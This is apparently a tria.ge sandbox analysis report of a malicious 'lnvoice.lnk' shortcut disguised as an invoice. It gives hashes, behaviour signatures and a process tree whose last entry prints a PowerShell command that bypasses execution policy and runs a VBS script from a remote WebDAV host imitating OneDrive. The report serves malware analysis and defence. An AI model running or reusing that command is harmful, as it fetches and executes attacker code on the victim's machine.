Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
08/04/2024, 17:29
Static task
static1
Behavioral task
behavioral1
Sample
lnvoice.lnk
Resource
win7-20240220-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
lnvoice.lnk
Resource
win10v2004-20240226-en
5 signatures
150 seconds
General
-
Target
lnvoice.lnk
-
Size
1KB
-
MD5
f3ef596835aba4c8bab9c6edb8be5a00
-
SHA1
34d857c809cc61ced5697eafacaf5ad5ce722120
-
SHA256
3a0720342249d8354e236292fc23be9d7d5a92bde5f23201283ef8f88671047f
-
SHA512
7f3414303866c0e77ec04d9c3950acc7d7a708683324d5c09d69ff2beaf66428e30450457b3751ac9938a9d537708e70780b4bc9189aa56124eba1d08ec5d048
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2600 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1688 wrote to memory of 2600 1688 cmd.exe 29 PID 1688 wrote to memory of 2600 1688 cmd.exe 29 PID 1688 wrote to memory of 2600 1688 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\lnvoice.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass \\onedrive.bounceme.net\DavWWWRoot\test.vbs2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-